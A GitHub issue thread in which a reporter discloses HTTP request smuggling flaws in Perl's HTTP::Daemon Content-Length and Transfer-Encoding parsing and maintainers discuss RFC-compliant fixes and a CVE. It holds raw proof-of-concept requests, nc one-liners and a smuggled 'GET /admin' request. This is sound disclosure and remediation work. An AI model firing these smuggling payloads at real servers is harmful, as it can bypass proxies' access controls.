Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Discrepancies in the Parsing of Content Length header leading to http request smuggling #56

Open
blessingcharles opened this issue May 30, 2022 · 23 comments

Comments

@blessingcharles
Copy link

blessingcharles commented May 30, 2022

Poor parsing of content-length header in httpdaemon will lead to http request smuggling

RFC security considerations

Libwwwperl parses poorly the content-length header , if a proxy downstream a request to Libwwwperl which violates RFC in parsing
the content-length header will lead to http request smuggling , as it ambigiously parse the incoming request and contradicts with
the downstreaming proxy

Examples:

  1. Content_Length is treated as content-length header by httpdaemon , hence when a proxy downstream a request by just forwarding the
    content_length header it will lead to http request smuggling
  2. Multiple content-length header with different field values got accepted

Reference for http request smuggling

  1. James Kettle research paper
  2. Portswigger

POC

Below here I attached all the poc for the discrepancies occured in httpdaemon in parsing the request which will lead to http request
smuggling

Discrepancy in Parsing

1. Multiple Content-Length with different values got accepted , which is violation according to RFC ,and can lead to http request smuggling

POC

Request

GET / HTTP/1.1
Host: localhost
Connection: close
Content-Length: 2
Content-Length: 3

abc

Response
HTTP/1.1 200 OK
Date: Mon, 30 May 2022 17:50:12 GMT
Server: libwww-perl-daemon/6.14
Content-Length: 24

Body Length: 2 Body: ab

2. Failed to parse the Content-Length correctly

Eg : Content-Length: 3 3 , Content-Length: 3\r\n 1

POC

Request

GET / HTTP/1.1
Host: localhost
Connection: close
Content-Length: 3 3

abc

Response

HTTP/1.1 200 OK
Date: Mon, 30 May 2022 18:02:08 GMT
Server: libwww-perl-daemon/6.14
Content-Length: 25

Body Length: 3 Body: abc

3. negative content-length field values got mapped to positive values differently

Eg : -3 = 1 , -2 = 2 , -1 = 3

POC

Request

GET / HTTP/1.1
Host: localhost
Connection: close
Content-Length: -1

abc

Response 

HTTP/1.1 200 OK
Date: Mon, 30 May 2022 18:10:12 GMT
Server: libwww-perl-daemon/6.14
Content-Length: 25

Body Length: 3 Body: abc

4. +ve sign got accepted before content-length field value

GET / HTTP/1.1
Host: localhost
Connection: close
Content-Length: +3

abc

HTTP/1.1 200 OK
Date: Mon, 30 May 2022 18:12:36 GMT
Server: libwww-perl-daemon/6.14
Content-Length: 25

Body Length: 3 Body: abc

5. Content_Length header got accepted as content-length , this will definitely lead to http request smuggling

Request

GET / HTTP/1.1
Host: localhost
Connection: close
Content_Length: 3

abc

Response

HTTP/1.1 200 OK
Date: Mon, 30 May 2022 18:14:23 GMT
Server: libwww-perl-daemon/6.14
Content-Length: 25

Body Length: 3 Body: abc

6. decimal values got accepted in content-length values

Request

GET / HTTP/1.1
Host: localhost
Connection: close
Content-Length: 03.00

abc

Response

HTTP/1.1 200 OK
Date: Mon, 30 May 2022 18:17:47 GMT
Server: libwww-perl-daemon/6.14
Content-Length: 25

Body Length: 3 Body: abc

7. FormFeed \x0c , BackSpace \x08 , Vertical tab \x0b got accepted before and after content-length values

Content-Length: [prefix]3[suffix]

 echo -ne "GET / HTTP/1.1\r\nHost: localhost\r\nContent-Length: \x0c3\r\n\r\naaa" | nc 10.16.56.236 8008


HTTP/1.1 200 OK
Date: Mon, 30 May 2022 18:20:17 GMT
Server: libwww-perl-daemon/6.14
Content-Length: 25

Body Length: 3 Body: aaa

version 6.14

Code to Reproduce

use HTTP::Daemon;
use HTTP::Status;
use Try::Tiny;

my $d = HTTP::Daemon->new(
    LocalAddr => '10.16.56.236',
    LocalPort => 8008,
) || die;

print "Server started at:", $d->url, ">\n";
while (my $c = $d->accept) {
    try{
        while (my $r = $c->get_request) {
        if ($r->method eq 'GET' and $r->uri->path eq "/") {
            
            my $body_data = "\rBody Length: " . length($r->content) . " Body: " . $r->content ;

            my $resp = HTTP::Response->new(200);
            $resp->content($body_data);

            $c->send_response($resp);
        }
        else {
            $c->send_error(RC_FORBIDDEN)
        }
        }
        $c->close;
        undef($c);
    }
    catch{
        $c->close;
        undef($c);
        warn "request failed" ;
    }
}
@oalders
Copy link
Member

oalders commented May 31, 2022

Thanks for this!

Content_Length header got accepted as content-length , this will definitely lead to http request smuggling

Although I understand why this is suboptimal, as far as I can tell, there's no spec which forbids this. There is a switch for this in nginx: https://nginx.org/en/docs/http/ngx_http_core_module.html#underscores_in_headers and also in HTTP::Headers:

https://metacpan.org/release/OALDERS/HTTP-Message-6.36/source/lib/HTTP/Headers.pm#L10-12

@blessingcharles
Copy link
Author

But accepting multiple content length headers with different values is pretty bad, as it was previosly exploited using http request smuggling by combining a proxy , which treats content_length and content-length as different header and forwards them . But http-daemon treats both of them as same and also multiple content-length with different values were also accepted .

RFC About multiple Content-length with different values in the 4th point , the server must reject it with 400 error .

@oalders
Copy link
Member

oalders commented Jun 1, 2022

Right, I'm not saying we shouldn't address this -- I just wasn't aware of any RFC forbidding the use of underscores. Thanks for the link.

@blessingcharles
Copy link
Author

Will there be any CVE for this , as multiple content-length and instead of hyphen , underscore get accepted in content-length .

References for HRS
  1. https://0xn3va.gitbook.io/cheat-sheets/web-application/http-request-smuggling

Previous CVE's

  1. https://cwe.mitre.org/data/definitions/444.html
  2. https://www.cvedetails.com/vulnerability-list/cweid-444/vulnerabilities.html
Possible Attack Scenarios
  1. If the server combine with a downstream proxy which forwards content_length as custom header while httpdaemon parses the content_length as a valid content-length might lead to HRS
  2. As httpdaemon accepts multiple CL with different values , if a downstream proxy interprets the second content-length and parse the body , forwards the request to http daemon will lead to HRS .

@oalders
Copy link
Member

oalders commented Jun 8, 2022

Just to add some context for the underscore thing. This was well before my time, but I did some digging to find out how we got here:

$TRANSLATE_UNDERSCORE was at one point documented, but it was removed in 5.08: https://metacpan.org/dist/libwww-perl/source/Changes#L927

Previously it had read:

To make the life easier for perl users who wants to avoid quoting before the => operator, you can use '_' as a replacement for '-' in header names (this behaviour can be suppressed by setting the $HTTP::Headers::TRANSLATE_UNDERSCORE variable to a FALSE value).

That documentation was removed almost exactly 18 years ago. It looks like the context for this behaviour was around not wanted to quote keys in $h->header( $field => $value, ... ).

Setting $HTTP::Headers::TRANSLATE_UNDERSCORE = 0; would be a (clunky) way to disable this behaviour in the current version of the library.

@blessingcharles
Copy link
Author

But accepting multiple content length header with different field value is really bad and prone to HRS .

@oalders
Copy link
Member

oalders commented Jun 10, 2022

I'm not arguing that the current behaviour great. So far I'm just providing context for why the code is in its current state.

@vanHoesel
Copy link
Member

Still Investigating...

The underscores_in_header is used to explicitly allow these headers, that otherwise would be ignored because of vulnerabilities.

The TRANSLATE_UNDERSCORE package variable has a different purpose, it makes Foo_Bar header the same as Foo-Bar

The latter behaviour is extremely dubious when dealing with incoming requests, According to the RFC, those are just different headers (unlike case-folding). One such use case is when working with good ole CGI base applications where you do not want to trip over CGI defined Environment Variables.

The translation is super helpful when creating a HTTP::Message object, and using the => 'fat-comma' to stringily the header name ... we should keep it there, However on incoming request where we read data from the socket, we ought to have been more cautious.

However, it does not hurt most of the times, and I doubt it would lead to any more risks of smuggling... as long as we ensure that both values are the same.

As part of the remedy, I would suggest to introduce a new HTTP::Daemon option: underscores_in_headers (or drop_underscores) that would intercept the get_request and filter out any headers that could be of a malicious source.

Unless there are other vulnerabilities know related to other headers, I think translating the _ to - is 'harmless' and we should not drop those headers by default.

GIVEN that we do fix the other Content-Length related issues:

  • multiple but different values
  • only accept integer values
  • only accept positive length
  • do not accept when chunked
  • ...

@blessingcharles
Copy link
Author

GET / HTTP/1.1
host: localhost
Content_Length: 3
Content-Length: 22

abcGET /admin HTTP/1.1

The above mentioned request is a potential candidate of HRS . when a proxy thinks content_length as a X header and content-length as RFC standard CL header and downstream the request with a body of 22 bytes . But HTTP Daemon treats the first content_length as the RFC standard header with length of 3 bytes , thus leading to HRS .

@vanHoesel
Copy link
Member

vanHoesel commented Jun 14, 2022

HTTP Daemon treats the first content_length as the RFC standard header with length of 3 bytes , thus leading to HRS

This is currently true because of the way perl handles arithmetic with strings, and that (with default TRANSLATE_UNDERSCORE = 1) multiple occurrences of the same HTTP Header-field, the values are , comma-joined.

my $len = $r->header('Content-Length');

results in a string value of 3, 22 and the used that within arithmetics at line 292:

my $missing = $len - length($buf);

the value 3 will be used.

As I mentioned:

However, it does not hurt most of the times, and I doubt it would lead to any more risks of smuggling... as long as we ensure that both values are the same.

and

GIVEN that we do fix the other Content-Length related issues:

• multiple but different values

In other words: we should fix how we compute $len and drop the connection when we have multiple but different values

@blessingcharles
Copy link
Author

Will there be any CVE for this , as this falls under CWE 444

Previous CVE's

1. https://cwe.mitre.org/data/definitions/444.html

2. https://www.cvedetails.com/vulnerability-list/cweid-444/vulnerabilities.html

Possible attack scenarios are explained in CWE 444

@vanHoesel
Copy link
Member

Will there be any CVE for this , as this falls under CWE 444

I will have a look into that in the morning, I'm unfamiliar with that process, but one it should be your first, right ?

@blessingcharles
Copy link
Author

Yeah , This is my first CVE . I found this while testing on various proxies and servers for parsing discrepancies which may lead to several security considerations for a course in my undergraduate degree . I created a protocol fuzzer tool namely BuzzShock for finding these kinds of discrepancies bugs .

@vanHoesel
Copy link
Member

@blessingcharles:

Will there be any CVE for this , as this falls under CWE 444

using Github builtin Security Advisories tool, a new CVE is requested

@genio
Copy link
Member

genio commented Jun 16, 2022

It looks like I forgot to include some testing of how things should behave: https://gist.github.com/genio/24c76f2ceab91f7509fb72415aafbd09

@vanHoesel While we should be wanting a positive integer, things like +3 should be allowed. Mojo tends to rely on Scalar::Util's looks_like_number - I think I'd prefer that over us rolling our own (even though it's not complex).

@vanHoesel
Copy link
Member

@genio, the commits in the Private Repo for the Security Advisory will only accept what is in the RFC, and reject anything else than a unsigned non negative number... as it shows in the RFC Content-Length: 1*DIGIT. As much as I do hate causing breakage rejecting 'something positive' with the plus-sign (+), I really see no valid reason that we should diver from the RFC. Mojolicious accepting it, is not a valid reason.

From the set of test you have done for Mojolicious, it looks to me that only the third block is doing the right thing.

Tomorrow, I'll try to figure out how to add tests to the new changes.

@vanHoesel
Copy link
Member

there is a fix for it available, and I created a Merge Request. However, I do not know how this all works with Dzil and git-hooks and other nice streamlined deployments.

@oalders can you take it from here ? please ?

@vanHoesel
Copy link
Member

vanHoesel commented Jun 22, 2022

@blessingcharles I am trying to understand why your POC 7 (FormFeed \x0c , BackSpace \x08 , Vertical tab \x0b got accepted before and after content-length values) would become an issue once we handle multiple Content-Length Header-field values correctly (that is, non-negative all the same integers):

HTTP::Daemon already deals with Content-Length/Transfer-Encoding and not have vulnerabilities regarding CWE-444 and request smuggling.

Perl solutions in general have a history of being lenient towards what they accept as input (and mostly) strict on what is produced as output. Accepting these 'whitespace' characters, being part of the \s regular expression character-class is what makes this module do what it does, and be nice to others.

I can easily make the handling of incoming requests more strict by changing the delimiters used when extracting HTTP-Header files from at line 166:

/^([^:\s]+)\s*:\s*(.*)/

to

/^([^:\s]+):[ \t]*(.*)/

This will be more in line with RFC, where there is no space allowed between the header-field name and the colon (:) and only 'Optional White Space' is allowed (which is defined as: OWS = *( SP / HTAB ).

When doing so, I could then eventually check what has been passed in as Header-field value and deal with the other \s whitespace characters.

However, I do not feel comfortable doing so, because that would mean that HTTP::Headers (used to push values onto a key) could potentially have 'dirty' characters that previously had been absent, potentially causing problems downstream.

@blessingcharles
Copy link
Author

@blessingcharles I am trying to understand why your POC 7 (FormFeed \x0c , BackSpace \x08 , Vertical tab \x0b got accepted before and after content-length values) would become an issue once we handle multiple Content-Length Header-field values correctly (that is, non-negative all the same integers):

HTTP::Daemon already deals with Content-Length/Transfer-Encoding and not have vulnerabilities regarding CWE-444 and request smuggling.

The Transfer-Encoding header also accepting \x09 , \x0c and \x08 with the chunked value , these quirks might lead to HRS if both the server and downstreaming proxy disagree with this . You can refer to this research article https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn , where they mention about this discrepancy problem .

Another interesting thing I noted , between header fieldname and colon multiple whitespaces are accepted but in RFC headers no whitespaces should be allowed between them .

RFC grammar

header-field   = field-name ":" OWS field-value OWS
field-name     = token
token = 1*tchar

tchar = "!" / "#" / "$" / "%" / "&" / "'" / "*" / "+" / "-" / "." /
    "^" / "_" / "`" / "|" / "~" / DIGIT / ALPHA

POC

echo -ne "GET / HTTP/1.1\r\nHost: localhost\r\nTransfer-Encoding         : \x0cchunked\r\n\r\n3\r\naaa\r\n0\r\n\r\n" | nc 192.168.1.21 8008

echo -ne "GET / HTTP/1.1\r\nHost: localhost\r\nTransfer-Encoding  : \x09chunked\r\n\r\n3\r\naaa\r\n0\r\n\r\n" | nc 192.168.1.19 8008

echo -ne "GET / HTTP/1.1\r\nHost: localhost\r\nTransfer-Encoding  : \x0bchunked\r\n\r\n3\r\naaa\r\n0\r\n\r\n" | nc 192.168.1.18 8008

HTTP::Daemon already deals with Content-Length/Transfer-Encoding and not have vulnerabilities regarding CWE-444 and request smuggling.

Yeah , There is no TE CL attacks are possible but CL CL attacks are currently possible which falls under CWE 444 , but after fixing [by rejecting multiple CL with different values and treating content_length as X header] it ,I think the major issue will be resolved from my point of view .

@vanHoesel
Copy link
Member

Another interesting thing I noted , between header fieldname and colon multiple whitespaces are accepted but in RFC headers no whitespaces should be allowed between them .

I was reading that, and would be very unpleasantly surprised to see HTTP-Header field names show up like HTTP-*-!Foo-Bar&Qux - lets just not do that!

@vanHoesel
Copy link
Member

Waiting for approval from @simbabque and guidance from @oalders to get this issue sorted.

@blessingcharles
Copy link
Author

Another interesting thing I noted , between header fieldname and colon multiple whitespaces are accepted but in RFC headers no whitespaces should be allowed between them .

I was reading that, and would be very unpleasantly surprised to see HTTP-Header field names show up like HTTP-*-!Foo-Bar&Qux - lets just not do that!

Yeah it is surprise , but most of the webservers are parsing like it eg: nodejs , golang , actix . Accepting the above mentioned header field-name , but they are rejecting if a space is encountered between header-field name and colon with 400 status code according to the RFC .

POC

On nodejs , golang , actix for different tchar characters , they are accepting it but rejecting if space presents

Random-header =  fru.*\!*'&%.brf\t: nfrunib

echo -ne "GET / HTTP/1.1\r\nHost  : localhost\r\nfru.*\!*'&%.brf\t: nfrunib\r\n\r\n" | nc localhost 8003

@oalders
Copy link
Member

oalders commented Jun 23, 2022

Waiting for approval from @simbabque and guidance from @oalders to get this issue sorted.

The work is going on in the background. 😄

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

4 participants